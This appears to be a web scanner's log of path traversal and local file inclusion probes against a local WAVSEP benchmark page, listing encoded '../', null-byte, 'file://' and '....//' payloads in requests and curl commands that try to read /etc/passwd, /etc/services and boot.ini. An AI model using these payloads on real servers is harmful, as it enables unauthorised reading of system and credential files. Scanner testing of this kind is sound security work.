GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
